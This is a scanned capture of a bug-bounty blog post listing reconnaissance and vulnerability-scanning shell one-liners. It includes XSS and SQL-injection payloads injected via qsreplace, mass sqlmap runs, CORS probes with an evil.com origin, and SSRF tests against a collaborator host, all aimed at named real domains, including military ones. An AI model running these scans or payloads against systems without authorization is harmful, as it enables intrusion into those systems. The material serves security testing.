reconshell.com
18.159.80.129
Public Scan
Submitted URL: https://t.co/c49iQqdPpz
Effective URL: https://reconshell.com/king-of-bug-bounty/
Submission: On December 13 via api from US — Scanned from DE
Form analysis
5 forms found in the DOM

GET https://reconshell.com/
<form role="search" method="get" class="search-form" action="https://reconshell.com/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Search …" value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>
POST https://reconshell.com/wp-comments-post.php
<form action="https://reconshell.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate="">
<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p>
<p class="comment-form-comment"><label for="comment">Comment</label> <textarea placeholder="Leave Your Comment" id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p>
<p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input placeholder="Name" id="author" name="author" type="text" value="" size="30" maxlength="245" required="required"></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input placeholder="Email" id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" required="required">
</p>
<p class="comment-form-url"><label for="url">Website</label> <input placeholder="Website" id="url" name="url" type="url" value="" size="30" maxlength="200"></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes"> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time
I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="btn-wrap" value="Post Comment"> <input type="hidden" name="comment_post_ID" value="7158" id="comment_post_ID">
<input type="hidden" name="comment_parent" id="comment_parent" value="0">
</p>
</form>
Text Content
Bug Bounty

KING OF BUG BOUNTY

Posted by Emma White, December 12, 2021

Our main goal is to share tips from some well-known bug hunters. Using recon methodology, we are able to find subdomains, APIs, and tokens that are already exploitable, so we can report them. We want to spread the idea of one-line tips and explain the commands behind them, so that new hunters can understand them better.
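Nearly every one-liner below pipes results through @TomNomNom's anew, which appends stdin lines to a file only if they are not already in it, echoing the new ones to stdout. A minimal awk stand-in showing that behaviour (assumption: `anew_like` is a hypothetical helper for illustration, not the real tool):

```shell
# anew-like behaviour: print only lines not already in the seen-file,
# and append those new lines to it (so later runs skip them too).
anew_like() {
  seen="$1"; touch "$seen"
  awk -v sf="$seen" '
    FILENAME == sf { have[$0] = 1; next }   # load already-known lines
    !($0 in have) && !dup[$0]++             # pass lines that are new and not duplicated in this stream
  ' "$seen" - | tee -a "$seen"
}

# usage: printf 'a\nb\n' | anew_like subs.txt   # prints and stores a, b
#        printf 'b\nc\n' | anew_like subs.txt   # prints and stores only c
```

This append-if-new step is what lets the long pipelines below be re-run without flooding the next tool with hosts that were already processed.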
--------------------------------------------------------------------------------

SCRIPTS THAT NEED TO BE INSTALLED

To run the project, you will need to install the following programs:

* Amass
* Anew
* Anti-burl
* Assetfinder
* Axiom
* Bhedak
* CF-check
* Chaos
* Cariddi
* Dalfox
* DNSgen
* Filter-resolved
* Findomain
* Ffuf
* Gargs
* Gau
* Gf
* Github-Search
* Gospider
* Gowitness
* Hakrawler
* HakrevDNS
* Haktldextract
* Haklistgen
* Html-tool
* Httpx
* Jaeles
* Jsubfinder
* Kxss
* LinkFinder
* Metabigor
* MassDNS
* Naabu
* Qsreplace
* Rush
* SecretFinder
* Shodan
* ShuffleDNS
* SQLMap
* Subfinder
* SubJS
* Unew
* WaybackURLs
* Wingman
* Notify
* Goop
* Tojson
* GetJS
* X8
* Unfurl
* XSStrike
* Page-fetch

BBRF SCOPE DOD

bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil'

BHEDAK

* Explained command

cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}"

.BASHRC SHORTCUTS BY OFJAAAH

reconjs(){
  gau -subs $1 | grep -iE '\.js' | grep -iEv '(\.jsp|\.json)' >> js.txt
  cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt
}
cert(){
  curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew
}
anubis(){
  curl -s "https://jldc.me/anubis/subdomains/$1" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew
}

ONELINER HAKLISTGEN

* @hakluke

subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done

cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt;

RUNNING JAVASCRIPT ON EACH PAGE AND SENDING IT TO A PROXY
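page-fetch loads each URL in a headless browser and evaluates `[...document.querySelectorAll("a")].map(n => n.href)` to harvest every anchor's href. For static HTML the harvesting step can be approximated with grep and sed alone (a sketch on a canned snippet; it misses links that only exist after JavaScript runs, which is the whole point of the browser-based tool):

```shell
# Static-HTML approximation of the href harvesting done by page-fetch:
# pull out href="..." attributes, then strip the attribute wrapper.
html='<a href="https://example.com/login">x</a><p>y</p><a href="/signup">z</a>'
printf '%s\n' "$html" \
  | grep -oE 'href="[^"]*"' \
  | sed 's/^href="//; s/"$//'
```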
* Explained command

cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080

RUNNING CARIDDI AS A CRAWLER

* Explained command

echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive

XSSTRIKE SCAN ON BUG BOUNTY TARGETS

* Explained command

xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer'

DALFOX SCAN ON BUG BOUNTY TARGETS

* Explained command

wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @

USING X8 FOR HIDDEN PARAMETER DISCOVERY

* Explained command

assetfinder domain | httpx -silent | sed 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate'

EXTRACT .JS FROM SUBDOMAINS

* Explained command

echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1

USING GOOP TO SEARCH FOR .GIT FILES
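goop hunts for exposed `.git` directories. The two building blocks of that check — suffixing `/.git/HEAD` onto each host (done elsewhere in this post with sed) and recognising a genuine HEAD file — can be sketched offline (assumption: no network here, the response body is hard-coded; goop or httpx would do the live probing):

```shell
# Step 1: turn each host into a /.git/HEAD candidate URL, as the sed
# one-liners in this post do.
printf 'https://a.example\nhttps://b.example\n' | sed 's#$#/.git/HEAD#'

# Step 2: a real HEAD file starts with "ref: refs/..." - gate on that
# signature instead of trusting a 200 status alone.
body='ref: refs/heads/master'
case "$body" in
  "ref: refs/"*) echo 'exposed .git' ;;
esac
```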
* Explained command

xargs -a xss -P10 -I@ sh -c 'goop @'

USING THE CHAOS LIST TO ENUMERATE ENDPOINTS

curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @'

USING WINGMAN TO SEARCH FOR REFLECTED / DOM XSS

* Explained command

xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify'

SEARCH ASNs WITH METABIGOR AND RESOLVE THE DOMAINS

* Explained command

echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'

ONELINERS

SEARCH .JSON WITH GOSPIDER, FILTERED THROUGH ANTI-BURL

* Explained command

gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl

SEARCH .JSON IN SUBDOMAINS

* Explained command

assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew

EXTRACT SUBDOMAINS FROM SONAR DNS

* Explained command

wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar

KXSS TO SEARCH FOR PARAMETER XSS

* Explained command

echo http://testphp.vulnweb.com/ | waybackurls | kxss

RECON SUBDOMAINS, THEN GAU AND DALFOX TO SEARCH FOR VULNS

* Explained command

assetfinder testphp.vulnweb.com | gau | dalfox pipe

RECON SUBDOMAINS AND SCREENSHOT EACH URL USING GOWITNESS

* Explained command

assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'

EXTRACT URLS FROM SOURCE-CODE COMMENTS

* Explained command

cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'

AXIOM "COMPLETE" RECON

* Explained command

findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u

DOMAIN / SUBDOMAIN EXTRACTION WITH HAKTLDEXTRACT

* Explained command

cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain'

SEARCH .JS USING HAKRAWLER

* Explained command

assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew

THIS ONE IS HUGE, BUT IT COLLECTS .JS WITH GAU + WAYBACK + GOSPIDER AND ANALYSES THE JS. YOU NEED THE TOOLS BELOW.

* Explained command

cat dominios | gau | grep -iE '\.js' | grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js' | grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS'

MY SIMPLE RECON AUTOMATION
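Several pipelines in this post (the reconjs shortcut, the gau + wayback + gospider collector) keep URLs that contain `.js` while dropping `.jsp` and `.json`. That grep pair can be checked against sample URLs with no external tools:

```shell
# The .js-but-not-.jsp/.json filter used in the JS-collection pipelines,
# exercised on canned URLs.
printf '%s\n' \
  'https://a.com/app.js' \
  'https://a.com/data.json' \
  'https://a.com/page.jsp' \
  'https://a.com/vendor.min.js?v=2' \
  | grep -iE '\.js' | grep -iEv '(\.jsp|\.json)'
```

Only `app.js` and `vendor.min.js?v=2` survive; the second grep's `-v` is what removes the false `.js` substring matches inside `.json` and `.jsp`.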
OFJAAAH.SH

* Explained command

chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1

DOWNLOAD ALL BOUNTY DOMAINS FROM CHAOS

* Explained command

curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH'

RECON TO SEARCH FOR SSRF

* Explained command

findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net

SHUFFLEDNS ON DOMAINS IN A FILE, THEN SCAN WITH NUCLEI

* Explained command

xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1

SEARCH ASNs WITH AMASS

* Explained command

Amass intel will search the organization "paypal" against a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all TLDs in that IP space (paypal.com, paypal.co.id, paypal.me).

amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500

SQL INJECTION ON A MASS DOMAIN FILE

* Explained command

httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'

USING CHAOS TO SEARCH JS

* Explained command

Chaos is an API by Project Discovery that discovers subdomains. Here we are querying their API for all known subdomains of "att.com". We then use httpx to find which of those domains are live and host an HTTP or HTTPS site.
We then pass those URLs to GoSpider to visit and crawl them for all links (JavaScript files, endpoints, etc.), and grep to find all the JS files. We pipe this through anew so we see the output iteratively (faster) and grep for "(http|https)://att.com" to make sure we don't receive output for domains that are not "att.com".

chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g"

SEARCH SUBDOMAINS USING GOSPIDER

* Explained command

GoSpider visits the hosts and crawls them for all links (JavaScript files, endpoints, etc.). We use a blacklist of static-asset extensions so it does not waste time fetching them. grep is a command-line utility for searching plain-text data sets for lines that match a regular expression; here it keeps the HTTP and HTTPS URLs.

gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew

USING GOSPIDER WITH CHAOS

* Explained command

GoSpider visits the hosts and crawls them for all links (JavaScript files, endpoints, etc.). Chaos is a subdomain search project; to use it you need an API key. xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input.

chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3'

USING RECON.DEV AND GOSPIDER TO CRAWL SUBDOMAINS

* Explained command

We use the recon.dev API to extract ready-made subdomain info, then parse the JSON output with jq and strip all blank spaces with sed, the stream editor. With anew we keep and display only unique domains, redirecting that list to httpx to build a new list with just the live domains. xargs drives gospider with 3 parallel processes, and a final grep with a regexp keeps just the http/https URLs.
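The `grep -Eo '(http|https)://[^/"]+'` step that appears in these gospider pipelines keeps only the scheme-plus-host part of each URL. It can be exercised standalone on canned crawler lines:

```shell
# Keep only scheme://host from crawler output; non-URL lines drop out,
# and sort -u deduplicates the hosts.
printf '%s\n' \
  'https://site.com/assets/app.js' \
  'http://cdn.site.com/img/a.png' \
  'not-a-url' \
  | grep -Eo '(http|https)://[^/"]+' | sort -u
```

The character class `[^/"]+` stops the match at the first `/` after the authority, which is why the paths disappear.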
curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" | jq -r '.[].rawDomains[]' | sed 's/ //g' | anew | httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew

PSQL – SEARCH SUBDOMAINS USING CRT.SH

* Explained command

Make use of the pgsql CLI of crt.sh: replace all commas with new lines and grep just the twitch text domains, with anew to confirm unique outputs.

psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew

SEARCH SUBDOMAINS USING GITHUB AND HTTPX

* Github-search

Using python3 to search subdomains; httpx filters hosts by up status-code response (200).

./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title

SEARCH SQL INJECTION USING QSREPLACE, LOOKING FOR SYNTAX ERRORS

* Explained command

grep "=" .txt | qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n"

SEARCH SUBDOMAINS USING JLDC

* Explained command

curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew

SEARCH SUBDOMAINS WITH ASSETFINDER, USING THE HAKRAWLER SPIDER TO SEARCH LINKS IN RESPONSE CONTENT

* Explained command

assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla"

SEARCH SUBDOMAINS IN CRT.SH

* Explained command

curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew

SEARCH SUBDOMAINS IN CRT.SH, THEN ASSETFINDER TO PROBE /.GIT/HEAD

* Explained command

curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

COLLECT JS FILES FROM HOSTS THAT ARE UP, USING GOSPIDER

* Explained command

xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew'

SUBDOMAIN SEARCH WITH BUFFEROVER, RESOLVING DOMAINS THROUGH HTTPX

* Explained command

curl -s https://dns.bufferover.run/dns?q=.sony.com | jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew

USING GARGS TO RUN GOSPIDER WITH PARALLEL PROCESSES

* Gargs
* Explained command

httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne

XSS INJECTION USING QSREPLACE ON URLS FILTERED FROM GOSPIDER

* Explained command

gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'

EXTRACT URLS FROM AN APK

* Explained command

apktool d app.apk -o uberApk; grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl"

CHAOS TO GOSPIDER

* Explained command

chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @

CHECKING FOR INVALID CERTIFICATES

* Real script
* Script King

xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx

USING SHODAN & NUCLEI

* Explained command

Shodan is a search engine that lets the user find specific types of computers connected to the internet. awk cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP toolkit, used here with -silent. Nuclei is a fast tool for configurable, template-based targeted scanning, offering massive extensibility and ease of use; you need to download the nuclei templates.

shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/

OPEN REDIRECT TEST USING GF

* Explained command

echo is a command that outputs the strings it is passed as arguments. waybackurls accepts line-delimited domains on stdin, fetches known URLs from the Wayback Machine for *.domain.com, and outputs them on stdout. httpx is a fast and multi-purpose HTTP toolkit. gf is a wrapper around grep that avoids typing common patterns, and anew appends lines from stdin to a file only if they don't already appear in the file, outputting the new lines to stdout and removing duplicates.

echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew

USING SHODAN WITH JAELES: "HOW DID I FIND A CRITICAL TODAY? WELL, AS I SAID, IT WAS VERY SIMPLE, USING SHODAN AND JAELES."

* Explained command

shodan domain domain | awk '{print $3}' | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @

USING CHAOS WITH JAELES: "HOW DID I FIND A CRITICAL TODAY?"

* Explained command

Chaos is a ProjectDiscovery project for subdomain recon. Since the output of chaos -d domain.com needs to be treated as http or https, we pass it through httpx to get usable results. We use anew, a tool by @TomNomNom that removes duplicates, so the output is ready for import into jaeles, which will scan using its signature templates.
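gf redirect works by matching URLs whose query parameters look like redirect sinks. A hand-rolled grep stand-in (assumption: this pattern is far smaller than gf's real JSON-defined pattern set, and is only for illustration):

```shell
# Keep URLs whose query parameters look like open-redirect sinks.
printf '%s\n' \
  'https://a.com/?next=/home' \
  'https://a.com/?id=3' \
  'https://a.com/login?redirect_url=https://evil.com' \
  | grep -iE '(\?|&)(next|url|target|redirect[a-z_]*|dest|return)='
```

Only the first and third URLs survive; `?id=3` does not match any sink-like parameter name.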
chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @

USING SHODAN WITH JAELES

* Explained command

domain="domaintotest"; shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}' | httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @' | anew JaelesShodanHosts

SEARCH FOR FILES USING ASSETFINDER AND FFUF

* Explained command

assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'

HTTPX USING THE NEW LOCATION MODE, AND XSS INJECTION USING QSREPLACE

* Explained command

httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>"

GRAB INTERNAL JUICY PATHS AND REQUEST THEM

* Explained command

export domain="https://target"; gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length'

DOWNLOAD THE BOUNTY-TARGETS LIST AND INJECT /.GIT/HEAD AT THE END OF EACH URL USING SED

* Explained command

wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

USING FINDOMAIN FOR SQL INJECTION

* Explained command

findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1

JAELES SCAN ON BUG BOUNTY TARGETS
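qsreplace, used throughout these XSS and SQLi one-liners, swaps every query-string value for a supplied payload. A naive sed stand-in (assumption: `qsreplace_like` is hypothetical; the real tool also deduplicates URLs and handles encoding, and this sed breaks on payloads containing `/`, `&`, or `\`):

```shell
# Replace every =value pair in the query string with the payload.
qsreplace_like() { sed -E "s/=[^&]*/=$1/g"; }

echo 'http://host/p?a=1&b=2' | qsreplace_like 'FUZZ'
# -> http://host/p?a=FUZZ&b=FUZZ
```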
* Explained command

wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @

JLDC SUBDOMAIN SEARCH, USING RUSH AND JAELES

* Explained command

curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}'

CHAOS TO SEARCH SUBDOMAINS, CHECK CLOUDFLARE IPS AND SCAN PORTS

* Explained command

chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent

SEARCH JS IN A FILE OF DOMAINS

* Explained command

cat FILE_TO_TARGET | httpx -silent | subjs | anew

SEARCH JS USING ASSETFINDER, RUSH AND HAKRAWLER

* Explained command

assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal"

SEARCH FOR CORS USING ASSETFINDER AND RUSH

* Explained command

assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"'

SEARCH FOR JS USING HAKRAWLER, RUSH & UNEW

* Explained command

cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx'

XARGS TO DIRSEARCH BRUTE FORCE

* Explained command

cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200,403,401,302 -e php,html,json,aspx,sql,asp,js'

ASSETFINDER TO RUN MASSDNS
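The CORS one-liner above greps the `curl -I` reply for the reflected evil.com Origin. The same gate can be checked on a canned response (assumption: no live curl here; in the real check the headers come from the target):

```shell
# Flag a response whose CORS headers reflect the attacker-controlled Origin.
resp='HTTP/1.1 200 OK
Access-Control-Allow-Origin: evil.com
Access-Control-Allow-Credentials: true'

if printf '%s\n' "$resp" | grep -q '^Access-Control-Allow-Origin: evil.com'; then
  printf '[VUL TO CORS]\n'
fi
```

Anchoring on the `Access-Control-Allow-Origin` header (rather than grepping for "evil.com" anywhere) avoids false positives when the string merely appears in the body.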
* Explained command

assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent

EXTRACT PATHS FROM JS

* Explained command

cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u

FIND SUBDOMAINS AND SECRETS WITH JSUBFINDER

* Explained command

cat subdomains.txt | httpx --silent | jsubfinder -s

SEARCH DOMAINS FROM IP RANGES

* Explained command

cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew

SEARCH NEW DOMAINS USING DNSGEN

* Explained command

xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain

LIST IPS AND EXTRACT DOMAINS, USING AMASS + A WORDLIST

* Explained command

amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt

SEARCH DOMAINS USING AMASS AND SCAN FOR VULNS WITH NUCLEI

* Explained command

amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30

VERIFY CERTIFICATES USING OPENSSL

* Explained command

sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' -connect hackerone.com:443 ) )

SEARCH DOMAINS USING OPENSSL CERTS
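The "EXTRACT PATHS FROM JS" lookaround grep can be tried on an inline sample instead of file.js (assumption: GNU grep, since `-P` enables PCRE; the backtick-quoted alternative from the original pattern is omitted here to keep the shell quoting readable):

```shell
# Pull double-quoted absolute paths out of JavaScript source.
printf '%s\n' 'fetch("/api/v1/users");load("/admin/panel")' \
  | grep -oP '(?<=")/[a-zA-Z0-9_?&=/#.-]*(?=")' | sort -u
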